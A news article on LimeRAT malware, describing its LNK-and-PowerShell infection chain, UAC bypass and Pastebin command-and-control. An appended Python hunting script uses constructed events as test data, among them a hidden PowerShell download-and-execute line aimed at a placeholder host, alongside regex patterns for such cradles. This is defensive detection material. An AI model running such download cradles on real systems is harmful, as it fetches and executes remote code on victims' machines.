
LimeRAT leverages unique infection technique to defeat traditional security mechanisms

  • The whole infection process begins with an LNK file.
  • The malware is capable of registering itself as ‘Critical Process’ on the infected systems.

LimeRAT is a powerful Remote Administration Tool that is publicly available to any Internet user. However, lately, it has been found that cybercriminals are using a unique infection technique to spread the malicious sample without being detected by anti-virus software.

How does the infection process start - The whole infection chain begins with an LNK file. Opening it lets the attackers download and run a PowerShell script named ‘rdp.ps1’ from a remote location; that script then serves as the dropper for the second stage of the infection.

“This script firstly retrieves the version of the Windows OS installed on the target machine using the “Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version” command. Then, depending on the returned value, it runs a couple of privilege escalation exploits able to bypass the UAC (User Account Control) feature, a well-known security mechanism introduced since Vista to avoid unauthorized system configuration changes,” the Yoroi researchers wrote.

What are its capabilities - A close investigation by the Cybaze-Yoroi researchers revealed that the malware registers itself as a ‘Critical Process’ on infected systems. If the user tries to kill it, the system displays a Blue Screen of Death (BSoD).

Besides this peculiar trick, the malware also includes a set of other dangerous capabilities such as:

  • USB drive propagation;
  • Infecting all files and folders on USB drives;
  • Using startup methods to evade detection;
  • Virtual machines and analysis box awareness to avoid detection;
  • Info-stealer and Crypto-stealer modules;
  • Keylogger module;
  • Backdoor and RDP access.

Upon successful installation, the malware’s command-and-control infrastructure abuses the Pastebin service to gain persistence on the victim’s system.
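The infection chain described above (an LNK that launches PowerShell to fetch and run a remote script, an OS version query via Win32_OperatingSystem) and the Pastebin-based command and control give defenders several process-creation patterns to hunt for. The following is an added detection example written for this article; it is not code from the original page or from Yoroi. It runs simple heuristics over constructed process-creation events in an assumed `parent|image|command_line` layout; the sample lines, the field layout and the tag names are all assumptions, and the regexes are generic PowerShell download-cradle and recon patterns, not LimeRAT-specific signatures.

```python
"""Hunt for LimeRAT-style infection-chain indicators in process-creation events.

Added example for this article, not code from the original page or from Yoroi.
The events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample events: "parent|image|command_line" (assumed layout).
SAMPLE_EVENTS = [
    # LNK double-click: explorer.exe spawns a hidden PowerShell that fetches and runs a remote script.
    "explorer.exe|powershell.exe|powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/rdp.ps1')\"",
    # Second-stage script queries the OS version to choose its next step.
    "powershell.exe|powershell.exe|powershell -c \"Get-WmiObject -Class Win32_OperatingSystem"
    " | Select-Object -ExpandProperty Version\"",
    # Implant reaching out to a raw Pastebin paste (placeholder paste id).
    "svchost.exe|LimeSample.exe|LimeSample.exe https://pastebin.com/raw/PLACEHOLDER",
    # Benign noise that must not be flagged.
    "explorer.exe|notepad.exe|notepad.exe C:\\Users\\user\\notes.txt",
    "services.exe|svchost.exe|svchost.exe -k netsvcs",
]


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Split a constructed event; maxsplit=2 keeps pipes inside the command line intact."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline)


# Generic PowerShell download-cradle and recon patterns (heuristics, not malware signatures).
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)", re.I)
INLINE_EXEC = re.compile(r"(\bIEX\b|Invoke-Expression)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
OS_VERSION_RECON = re.compile(r"Get-WmiObject.*Win32_OperatingSystem.*Version", re.I)
PASTEBIN_RAW = re.compile(r"pastebin\.com/raw/", re.I)

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def detect(ev: ProcEvent) -> List[str]:
    """Return the list of heuristic tags that fire on a single event."""
    tags: List[str] = []
    is_ps = ev.image in POWERSHELL_IMAGES
    # explorer.exe -> hidden PowerShell is how a double-clicked LNK typically appears in telemetry.
    if ev.parent == "explorer.exe" and is_ps and HIDDEN_WINDOW.search(ev.cmdline):
        tags.append("explorer_spawned_hidden_powershell")
    # Fetch-and-execute in one command line: the rdp.ps1 retrieval step.
    if is_ps and DOWNLOAD_CRADLE.search(ev.cmdline) and INLINE_EXEC.search(ev.cmdline):
        tags.append("powershell_download_cradle")
    # OS version enumeration used to pick the follow-on behaviour.
    if is_ps and OS_VERSION_RECON.search(ev.cmdline):
        tags.append("os_version_recon")
    # Any process pulling a raw paste is worth a look, regardless of image name.
    if PASTEBIN_RAW.search(ev.cmdline):
        tags.append("pastebin_raw_fetch")
    return tags


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map event index -> tags for every event that triggered at least one heuristic."""
    findings: Dict[int, List[str]] = {}
    for idx, line in enumerate(lines):
        tags = detect(parse_event(line))
        if tags:
            findings[idx] = tags
    return findings


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(tags)}")
```

Each heuristic on its own is noisy (administrators also query Win32_OperatingSystem, and legitimate scripts download content); the value is in correlating them on one host within a short window, which is how an analyst would triage the chain this article describes.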
